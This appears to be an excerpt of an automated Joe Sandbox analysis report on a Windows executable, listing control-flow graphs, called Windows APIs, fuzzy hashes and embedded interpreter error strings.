                            control_flow_graph 1863 1400af3a0-1400af3cb 1864 1400af3cd-1400af3dc LoadLibraryExW 1863->1864 1865 1400af3de 1863->1865 1866 1400af3e5-1400af3e8 1864->1866 1865->1866 1867 1400af5ae-1400af5b1 1866->1867 1868 1400af3ee-1400af400 1866->1868 1869 1400af5ba-1400af5be 1867->1869 1870 1400af5b3-1400af5b8 1867->1870 1871 1400af40e-1400af441 EnumResourceNamesW 1868->1871 1872 1400af402-1400af40c 1868->1872 1873 1400af5c2-1400af5ca ExtractIconW 1869->1873 1870->1873 1874 1400af446-1400af449 1871->1874 1872->1874 1875 1400af5d0-1400af5e9 1873->1875 1876 1400af44f-1400af461 FindResourceW 1874->1876 1877 1400af577-1400af58a 1874->1877 1876->1877 1880 1400af467-1400af476 LoadResource 1876->1880 1878 1400af58c-1400af58f 1877->1878 1879 1400af596-1400af599 1877->1879 1878->1879 1881 1400af591-1400af594 1878->1881 1882 1400af59b-1400af59e FreeLibrary 1879->1882 1883 1400af5a4-1400af5a7 1879->1883 1880->1877 1884 1400af47c-1400af48b LockResource 1880->1884 1881->1883 1882->1883 1883->1867 1886 1400af5a9-1400af5ac 1883->1886 1884->1877 1885 1400af491-1400af49a 1884->1885 1887 1400af49c-1400af4a5 GetSystemMetrics 1885->1887 1888 1400af4a7-1400af4b7 1885->1888 1886->1875 1887->1888 1888->1877 1889 1400af4bd-1400af4c8 1888->1889 1890 1400af4d0-1400af4de 1889->1890 1891 1400af4e0-1400af4e6 1890->1891 1892 1400af4e8-1400af4ea 1890->1892 1893 1400af4ed-1400af4ef 1891->1893 1892->1893 1894 1400af4f1-1400af4f4 1893->1894 1895 1400af4f7-1400af502 1893->1895 1894->1895 1895->1890 1896 1400af504-1400af507 1895->1896 1896->1877 1897 1400af509-1400af521 FindResourceW 1896->1897 1897->1877 1898 1400af523-1400af532 LoadResource 1897->1898 1898->1877 1899 1400af534-1400af543 LockResource 1898->1899 1899->1877 1900 1400af545-1400af574 SizeofResource CreateIconFromResourceEx 1899->1900 1900->1877
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Resource$Load$FindIconLock$CreateEnumExtractFromLibraryMetricsNamesSizeofSystem
                            • String ID:
                            • API String ID: 1568753105-0
                            • Opcode ID: c0203156b92e32127f6de8b076c345afb3e2e429f059fbe4e914985719cc95ad
                            • Instruction ID: 5e1e8fa29e4a3c6f95bed64de419706901ec8fd4e3d1dd421cb95e770b26a536
                            • Opcode Fuzzy Hash: c0203156b92e32127f6de8b076c345afb3e2e429f059fbe4e914985719cc95ad
                            • Instruction Fuzzy Hash: B151B331701B5086EB669FA3A4447F96290BB5CBD4F084629EF4A5BBB4DB3CC885DB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1901 14001f770-14001f79b call 1400ca9a4 1904 14001f7a3-14001f7f7 call 1400cb2e0 SetTimer 1901->1904 1905 14001f79d-14001f7a2 1901->1905 1908 14001f806-14001f838 GetTickCount 1904->1908 1909 14001f7f9-14001f801 1904->1909 1911 14001f861-14001f894 GetTickCount call 140032520 1908->1911 1912 14001f83a-14001f85a SetTimer 1908->1912 1910 14001f8d5-14001f8e3 1909->1910 1914 14001f8e5-14001f8f0 1910->1914 1915 14001f92a-14001f9dc call 1400cb2e0 1910->1915 1917 14001f899-14001f8a9 1911->1917 1912->1911 1918 14001f8f2-14001f8f5 1914->1918 1919 14001f8fb-14001f909 1914->1919 1927 14001f9de-14001f9fa call 1400b14e0 1915->1927 1928 14001f9ff-14001fa0f 1915->1928 1923 14001f8ab-14001f8c8 KillTimer 1917->1923 1924 14001f8ce 1917->1924 1918->1919 1920 14001f90b call 1400cb11c 1919->1920 1921 14001f910-14001f923 call 1400cb114 1919->1921 1920->1921 1921->1915 1923->1924 1924->1910 1939 14001fc43-14001fc5f 1927->1939 1931 14001fa11-14001fa15 1928->1931 1932 14001fa18-14001fa23 1928->1932 1931->1932 1934 14001fa35-14001fa3f 1932->1934 1935 14001fa25-14001fa30 call 1400060c0 1932->1935 1937 14001fa41-14001fa45 1934->1937 1938 14001fa66-14001fa6a 1934->1938 1944 14001fc3e 1935->1944 1937->1938 1941 14001fa47-14001fa61 call 140040740 1937->1941 1942 14001fa6c-14001fa7b call 1400b1b90 1938->1942 1943 14001fa80-14001fa86 1938->1943 1941->1944 1942->1944 1947 14001fa88-14001fa96 1943->1947 1948 14001fa9d-14001faad 1943->1948 1944->1939 1947->1948 1949 14001fc11-14001fc18 1948->1949 1950 14001fab3-14001fac0 1948->1950 1955 14001fc27-14001fc35 1949->1955 1956 14001fc1a-14001fc22 call 1400cb2e0 1949->1956 1953 14001fac2-14001fac4 1950->1953 1954 14001fad5-14001fadd 1950->1954 1958 14001fb12-14001fb16 1953->1958 1959 14001fac6-14001fad0 1953->1959 1954->1958 1960 14001fadf-14001fae3 1954->1960 1962 14001fc39 1955->1962 1956->1955 1966 14001fb22-14001fb2a 1958->1966 1967 14001fb18-14001fb1d 1958->1967 1963 14001fc05-14001fc0d 1959->1963 1964 14001fae5-14001faea 1960->1964 1965 14001faec-14001faf4 1960->1965 1962->1944 1963->1949 1968 14001faf8-14001fb03 call 1400aa400 1964->1968 1965->1968 1969 14001fbcc-14001fbd7 1966->1969 1970 14001fb30-14001fb37 1966->1970 1967->1969 1968->1962 1989 14001fb09-14001fb0d 1968->1989 1972 14001fbd9-14001fbdc 1969->1972 1973 14001fbec 1969->1973 1974 14001fb88-14001fb8f 1970->1974 1975 14001fb39-14001fb45 1970->1975 1972->1973 1982 14001fbde-14001fbea call 1400cb11c 1972->1982 1976 14001fbef-14001fbf2 1973->1976 1979 14001fb91-14001fb98 1974->1979 1980 14001fb9a-14001fba1 1974->1980 1977 14001fb47 1975->1977 1978 14001fb4f-14001fb65 1975->1978 1983 14001fbf4-14001fbff call 1400ca9a4 1976->1983 1984 14001fc60-14001fc63 1976->1984 1977->1978 1985 14001fb67-14001fb6f 1978->1985 1986 14001fb7e-14001fb86 1978->1986 1979->1969 1987 14001fba3-14001fbc3 1980->1987 1988 14001fbc5 1980->1988 1982->1976 1983->1984 1999 14001fc01 1983->1999 1993 14001fc76-14001fc7a 1984->1993 1994 14001fc65-14001fc74 1984->1994 1985->1986 1992 14001fb71-14001fb7b 1985->1992 1986->1969 1987->1969 1988->1969 1989->1963 1992->1986 1996 14001fc7e-14001fc9c call 140040740 1993->1996 1994->1996 1996->1962 1999->1963
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _errno$AllocateHeapTimer_callnewhfreemalloc
                            • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                            • API String ID: 4178756891-457448710
                            • Opcode ID: e6366f6a94b29d39e5f010e0094093afdbc9b1c6f862037dcbd1b9d2d24e3e10
                            • Instruction ID: 077ae810bc4ca999dc93366e368ff4484df90a768739f30114619d90bdd23bfa
                            • Opcode Fuzzy Hash: e6366f6a94b29d39e5f010e0094093afdbc9b1c6f862037dcbd1b9d2d24e3e10
                            • Instruction Fuzzy Hash: 39E1BF72204B8486EB169F26E4903E937A1F74CFD8F544126EF4A1B7B9CB39C491E750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2001 140036eed-140036ef4 2002 140036f9a-140036fbb call 1400ad040 2001->2002 2003 140036efa-140036f19 call 1400251f0 2001->2003 2008 140037032-140037045 2002->2008 2009 140036fbd-140036fcd call 14000c680 2002->2009 2003->2002 2010 140036f1b-140036f26 2003->2010 2011 140037053 2008->2011 2012 140037047-14003704c 2008->2012 2023 140036fcf-140036fe4 call 1400ca91c 2009->2023 2024 14003700d 2009->2024 2014 140036f34-140036f3e 2010->2014 2015 140036f28-140036f2f 2010->2015 2017 140037055-140037059 2011->2017 2012->2011 2016 14003704e-140037051 2012->2016 2020 140036f64-140036f6e 2014->2020 2021 140036f40-140036f4c 2014->2021 2019 140038a53 2015->2019 2016->2017 2022 14003705d-14003706c call 140024d80 2017->2022 2025 140038a58 2019->2025 2020->2002 2027 140036f70-140036f7a 2020->2027 2021->2020 2026 140036f4e-140036f5f 2021->2026 2022->2019 2039 140038a84-140038a86 2022->2039 2040 140036fe6-140036ff5 call 140025060 2023->2040 2041 140036ffa-140037008 2023->2041 2024->2008 2032 14003700f-140037012 2024->2032 2030 140038a60-140038a6c 2025->2030 2031 140038a5b call 1400403f0 2025->2031 2026->2025 2033 140036f84-140036f95 2027->2033 2034 140036f7c-140036f82 2027->2034 2042 140038a72-140038a77 2030->2042 2043 140038e4e-140038e7b 2030->2043 2031->2030 2032->2008 2035 140037014-140037030 2032->2035 2033->2025 2034->2002 2034->2033 2035->2022 2044 140038a8a-140038a91 2039->2044 2040->2039 2041->2019 2042->2044 2044->2043 2046 140038a97-140038aa5 2044->2046 2048 140038ab1 2046->2048 2049 140038ab5-140038ab8 2048->2049 2050 140038e4c 2049->2050 2051 140038abe-140038ac0 2049->2051 2050->2043 2053 140032601-14003261e GetTickCount 2051->2053 2054 1400325d0-1400325d8 2051->2054 2057 140032657-14003265e 2053->2057 2058 140032620-14003263d PeekMessageW 2053->2058 2055 1400325da-1400325e7 GlobalUnlock 2054->2055 2056 1400325ee-1400325fa CloseClipboard 2054->2056 2055->2056 2056->2053 2061 14003268a-140032698 2057->2061 2062 140032660-140032667 2057->2062 2059 140032649-140032651 GetTickCount 2058->2059 2060 14003263f-140032644 call 140001a70 2058->2060 2059->2057 2060->2059 2063 14003269a-14003269d 2061->2063 2064 14003269f-1400326a5 2061->2064 2062->2061 2066 140032669-140032672 2062->2066 2063->2064 2067 1400326b1-1400326bd call 140001a70 2063->2067 2068 1400326c4-1400326cb 2064->2068 2069 1400326a7-1400326af 2064->2069 2066->2061 2070 140032674-140032679 2066->2070 2067->2068 2072 1400326ec-1400326ff 2068->2072 2073 1400326cd 2068->2073 2069->2067 2069->2068 2074 140032684-140032687 2070->2074 2075 14003267b-140032682 2070->2075 2078 140032701-140032748 GetTickCount 2072->2078 2079 14003274d-140032753 2072->2079 2077 1400326d0-1400326e3 call 140001a70 2073->2077 2074->2061 2075->2061 2089 1400326e5 2077->2089 2078->2079 2080 140032791 2079->2080 2081 140032755-140032757 2079->2081 2085 140032798-1400327a4 2080->2085 2081->2080 2083 140032759-140032762 2081->2083 2083->2085 2086 140032764-14003277d call 14008a1a0 2083->2086 2087 1400327aa-1400327ae 2085->2087 2088 14003295e-140032971 2085->2088 2086->2043 2098 140032783-14003278f 2086->2098 2087->2088 2093 1400327b4-1400327c9 call 140039340 2087->2093 2091 140033c77-140033ca4 2088->2091 2092 140032977-14003298a 2088->2092 2089->2072 2095 140038e41-140038e43 2091->2095 2096 140033caa-140033cb4 2091->2096 2099 140033c06-140033c0a 2092->2099 2102 140032896-1400328a8 2093->2102 2103 1400327cf-1400327db 2093->2103 2095->2043 2101 140038aa7 2096->2101 2098->2085 2099->2101 2106 140038aac 2101->2106 2104 14003294c-140032953 2102->2104 2105 1400328ae-1400328b5 2102->2105 2107 14003280f-14003282d call 140032520 2103->2107 2108 1400327dd 2103->2108 2104->2050 2109 140032959 2104->2109 2110 1400328b7 2105->2110 2111 1400328ef-14003290d call 140032520 2105->2111 2106->2048 2118 140032832-140032835 2107->2118 2112 1400327e0-14003280b call 140032520 2108->2112 2109->2048 2115 1400328c0-1400328eb call 140032520 2110->2115 2125 140032912-140032919 2111->2125 2122 14003280d 2112->2122 2128 1400328ed 2115->2128 2118->2048 2123 14003283b-140032842 2118->2123 2122->2118 2126 140038ad1-140038ada 2123->2126 2127 140032848-14003284b 2123->2127 2129 140038ac5-140038acc 2125->2129 2130 14003291f-140032922 2125->2130 2126->2043 2127->2126 2131 140032851-140032854 2127->2131 2128->2125 2129->2050 2130->2129 2132 140032928-14003292b 2130->2132 2134 140032871-140032882 2131->2134 2135 140032856-14003285e 2131->2135 2132->2099 2133 140032931-140032939 2132->2133 2136 140038adf-140038aeb 2133->2136 2137 14003293f-140032947 2133->2137 2134->2049 2138 140032888-140032891 2134->2138 2135->2129 2139 140032864-14003286c 2135->2139 2136->2043 2137->2106 2138->2049 2139->2048
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID: Delete$Parameter #1 invalid.$Parameter #1 must not be blank in this case.$Parameter #2 invalid.$Target label does not exist.
                            • API String ID: 1623861271-14243736
                            • Opcode ID: 170ba651c1674d1279c71c36e1bdddfff0732a7a2a17f9185ea6cdc42fcc8acb
                            • Instruction ID: 26eb0c6a927c8469de8453c9fe8dc0c9a9131a3f6a014df82fcab0b3381e4e2a
                            • Opcode Fuzzy Hash: 170ba651c1674d1279c71c36e1bdddfff0732a7a2a17f9185ea6cdc42fcc8acb
                            • Instruction Fuzzy Hash: FCD18A32205B4085FB6BCB27E8947EA67A1F74DBE4F544116EB9987AF5DB38C880C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Window$ClassCurrentDialogDirectoryDragFinishForegroundMessageNameProcessThread
                            • String ID: #32770
                            • API String ID: 3456408793-463685578
                            • Opcode ID: 84b13adb65ceb99b281e05724dc7483e5ead739dbe4e009cd9d285627489fc5a
                            • Instruction ID: 49313f828538e75c30cdc6f1b82b6477001a2d0cb5092b9eb6642ea2267f5eaa
                            • Opcode Fuzzy Hash: 84b13adb65ceb99b281e05724dc7483e5ead739dbe4e009cd9d285627489fc5a
                            • Instruction Fuzzy Hash: 92C12972205B818AEB67CF27B8543E937A4F78DBD8F184125EB5A17AB5DB34C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _amsg_exit$CommandInfoInitializeLineStartup__wsetargv_cinit_wwincmdln
                            • String ID:
                            • API String ID: 697445056-0
                            • Opcode ID: bce173359365123898862994a165c1e3b1e3734ab59bfec563374195f2aef69a
                            • Instruction ID: 51f8df33ae2182358a762f7e5c0acf8f3a72d97982b6cc7e773f68050256edbc
                            • Opcode Fuzzy Hash: bce173359365123898862994a165c1e3b1e3734ab59bfec563374195f2aef69a
                            • Instruction Fuzzy Hash: 33415C7160834186FB5FBBA3A5513E93291AB8D7C4F00403AB746872F3EF7CC841A652
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: free$ClipboardCloseCountGlobalMessagePeekTickUnlock
                            • String ID: Jumps cannot exit a FINALLY block.
                            • API String ID: 2404689025-672026804
                            • Opcode ID: 43d9194056ab89d80e4a628be4931cc454df74e0c15ad80cb1a3a755224a8d3b
                            • Instruction ID: 11d81beff7c062691fcf3309096d5211e5507ad6f342d50fc40e6d568f83c0dd
                            • Opcode Fuzzy Hash: 43d9194056ab89d80e4a628be4931cc454df74e0c15ad80cb1a3a755224a8d3b
                            • Instruction Fuzzy Hash: ED027872604B448AEB6B8B27E4807EA77A1F74DBE4F180116EF5947BB5DB38D881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Message$PeekSleep
                            • String ID: /$uL
                            • API String ID: 2985371716-1063157875
                            • Opcode ID: 1149db2fec4be604e6d0738c93d0896230f924d54a21e451ef9d554d7e32668d
                            • Instruction ID: 1af2d153454a1643499736a5c385c5f9bea2398b6997ec81ffdbcc6d3eaea01c
                            • Opcode Fuzzy Hash: 1149db2fec4be604e6d0738c93d0896230f924d54a21e451ef9d554d7e32668d
                            • Instruction Fuzzy Hash: 417162726046809AFB57CF27F8547E937A1F78CB98F144126EB8A476B5CB34C482CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3554 14003330c-140033336 call 1400cbd40 3557 14003333c-140033365 call 14003c660 3554->3557 3558 1400333dd-140033408 call 1400403f0 3554->3558 3564 140033367-14003339b call 14003c8e0 3557->3564 3565 14003339d 3557->3565 3563 1400334ca-1400334fb 3558->3563 3566 140033501-140033504 3563->3566 3567 140038e4c 3563->3567 3569 1400333a0-1400333ac 3564->3569 3565->3569 3566->3567 3573 14003350a-14003350d 3566->3573 3572 140038e4e-140038e7b 3567->3572 3570 1400333ba-1400333d8 call 1400cb11c call 1400cb114 3569->3570 3571 1400333ae-1400333b5 call 1400cb11c 3569->3571 3570->3563 3571->3570 3573->3567 3577 140033513-14003351a 3573->3577 3579 1400337d5-1400337da 3577->3579 3580 140033520-140033527 3577->3580 3581 140038ab1 3579->3581 3582 140038ab5-140038ab8 3579->3582 3584 14003353c-140033543 3580->3584 3585 140033529-140033531 3580->3585 3581->3582 3582->3567 3588 140038abe-140038ac0 3582->3588 3586 140038ae6-140038aeb 3584->3586 3587 140033549-140033556 3584->3587 3590 140033537-1400337d0 3585->3590 3591 140038b7b-140038e49 3585->3591 3586->3572 3587->3582 3595 140032601-14003261e GetTickCount 3588->3595 3596 1400325d0-1400325d8 3588->3596 3590->3579 3591->3567 3599 140032657-14003265e 3595->3599 3600 140032620-14003263d PeekMessageW 3595->3600 3597 1400325da-1400325e7 GlobalUnlock 3596->3597 3598 1400325ee-1400325fa CloseClipboard 3596->3598 3597->3598 3598->3595 3603 14003268a-140032698 3599->3603 3604 140032660-140032667 3599->3604 3601 140032649-140032651 GetTickCount 3600->3601 3602 14003263f-140032644 call 140001a70 3600->3602 3601->3599 3602->3601 3605 14003269a-14003269d 3603->3605 3606 14003269f-1400326a5 3603->3606 3604->3603 3608 140032669-140032672 3604->3608 3605->3606 3609 1400326b1-1400326bd call 140001a70 3605->3609 3610 1400326c4-1400326cb 3606->3610 3611 1400326a7-1400326af 3606->3611 3608->3603 3612 140032674-140032679 3608->3612 3609->3610 3614 1400326ec-1400326ff 3610->3614 3615 1400326cd 3610->3615 3611->3609 3611->3610 3616 140032684-140032687 3612->3616 3617 14003267b-140032682 3612->3617 3620 140032701-140032748 GetTickCount 3614->3620 3621 14003274d-140032753 3614->3621 3619 1400326d0-1400326e3 call 140001a70 3615->3619 3616->3603 3617->3603 3631 1400326e5 3619->3631 3620->3621 3622 140032791 3621->3622 3623 140032755-140032757 3621->3623 3627 140032798-1400327a4 3622->3627 3623->3622 3625 140032759-140032762 3623->3625 3625->3627 3628 140032764-14003277d call 14008a1a0 3625->3628 3629 1400327aa-1400327ae 3627->3629 3630 14003295e-140032971 3627->3630 3628->3572 3640 140032783-14003278f 3628->3640 3629->3630 3635 1400327b4-1400327c9 call 140039340 3629->3635 3633 140033c77-140033ca4 3630->3633 3634 140032977-14003298a 3630->3634 3631->3614 3637 140038e41-140038e43 3633->3637 3638 140033caa-140033cb4 3633->3638 3641 140033c06-140033c0a 3634->3641 3644 140032896-1400328a8 3635->3644 3645 1400327cf-1400327db 3635->3645 3637->3572 3643 140038aa7 3638->3643 3640->3627 3641->3643 3648 140038aac 3643->3648 3646 14003294c-140032953 3644->3646 3647 1400328ae-1400328b5 3644->3647 3649 14003280f-14003282d call 140032520 3645->3649 3650 1400327dd 3645->3650 3646->3567 3651 140032959 3646->3651 3652 1400328b7 3647->3652 3653 1400328ef-14003290d call 140032520 3647->3653 3648->3581 3660 140032832-140032835 3649->3660 3654 1400327e0-14003280b call 140032520 3650->3654 3651->3581 3657 1400328c0-1400328eb call 140032520 3652->3657 3667 140032912-140032919 3653->3667 3664 14003280d 3654->3664 3670 1400328ed 3657->3670 3660->3581 3665 14003283b-140032842 3660->3665 3664->3660 3668 140038ad1-140038ada 3665->3668 3669 140032848-14003284b 3665->3669 3671 140038ac5-140038acc 3667->3671 3672 14003291f-140032922 3667->3672 3668->3572 3669->3668 3673 140032851-140032854 3669->3673 3670->3667 3671->3567 3672->3671 3674 140032928-14003292b 3672->3674 3676 140032871-140032882 3673->3676 3677 140032856-14003285e 3673->3677 3674->3641 3675 140032931-140032939 3674->3675 3678 140038adf-140038ae3 3675->3678 3679 14003293f-140032947 3675->3679 3676->3582 3680 140032888-140032891 3676->3680 3677->3671 3681 140032864-14003286c 3677->3681 3678->3586 3679->3648 3680->3582 3681->3581
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTickfree$ClipboardCloseGlobalMessagePeekUnlockmalloc
                            • String ID: Out of memory.
                            • API String ID: 2261973038-4087320997
                            • Opcode ID: 91fa6281f2abb8e96c6eb3eb6a0a92057783dbd265ec9c8811d5a6502596e99f
                            • Instruction ID: 426ea23cb0a584ebe7be426a9f350f2fcfeb2d3257a83d6a6a28297b01ac80b4
                            • Opcode Fuzzy Hash: 91fa6281f2abb8e96c6eb3eb6a0a92057783dbd265ec9c8811d5a6502596e99f
                            • Instruction Fuzzy Hash: C6C16D76605B408AEB6BCB27E8807DA77A1F74DBD4F140116EB9947BB5DB38D881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
